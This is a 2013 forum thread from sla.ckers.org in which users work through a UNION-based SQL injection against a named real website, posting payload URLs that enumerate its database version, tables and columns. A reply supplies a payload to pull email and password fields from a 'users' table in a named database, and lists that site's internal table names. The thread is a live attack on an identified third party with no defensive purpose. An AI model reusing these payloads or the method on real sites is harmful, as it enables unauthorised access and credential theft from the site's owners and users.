Cenzic 232 Patent
Paid Advertising
sla.ckers.org is
ha.ckers sla.cking
Sla.ckers.org
How do you completely compromise a machine given a text box or badly validated input box? This is a place to talk about code issues (PHP includes, null byte injection, backticks, pipe, etc...) as well as how to properly construct an SQL injection attack. 
Go to Topic: PreviousNext
Go to: Forum ListMessage ListNew TopicSearchLog In
i can't extract data !!!!
Posted by: versus
Date: May 21, 2013 05:16PM

ok i can get data :

vuln link :

http://faucherbotanix.com/detail.php?id=12'

easy part :

http://faucherbotanix.com/detail.php?id=-12 union all select 1,user(),3,version(),5,database()-- -

ok now
http://faucherbotanix.com/detail.php?id=-12 union all select 1,table_name,3,4,5,6 from information_schema.tables--

i can found : users

now column of users

http://faucherbotanix.com/detail.php?id=-12 union all select 1,column_name,3,4,5,6 from information_schema.columns where table_name=CHAR(117, 115, 101, 114, 115) limit 1,1-- -

i get

username

so when i want to see this usernam im block :(

http://faucherbotanix.com/detail.php?id=-12 union all select 1,username,3,4,5,6 from users--

i get :

Warning: mysql_fetch_array() expects parameter 1 to be resource, boolean given in /nfs/c07/h04/mnt/110601/domains/faucherbotanix.com/html/detai


any help :) thnk's

Options: ReplyQuote
Re: i can't extract data !!!!
Posted by: annen
Date: May 22, 2013 01:07AM

Tables found: Departement,Horaire_employe,Jour,circulaires,employe,horaires,produits,semaine,slider
no "users" table in current db.
you'd find which db have the table "users"!

Options: ReplyQuote
Re: i can't extract data !!!!
Posted by: annen
Date: May 22, 2013 01:10AM

http://faucherbotanix.com/detail.php?id=-12 union all select 1,2,3,email,5,password from db110601_cai.users--+-

Options: ReplyQuote
Re: i can't extract data !!!!
Posted by: versus
Date: May 22, 2013 11:51AM

thnk's annen :) ;)

Options: ReplyQuote
Re: i can't extract data !!!!
Posted by: hack2012
Date: June 02, 2013 02:12AM

on table users

Options: ReplyQuote


Sorry, only registered users may post in this forum.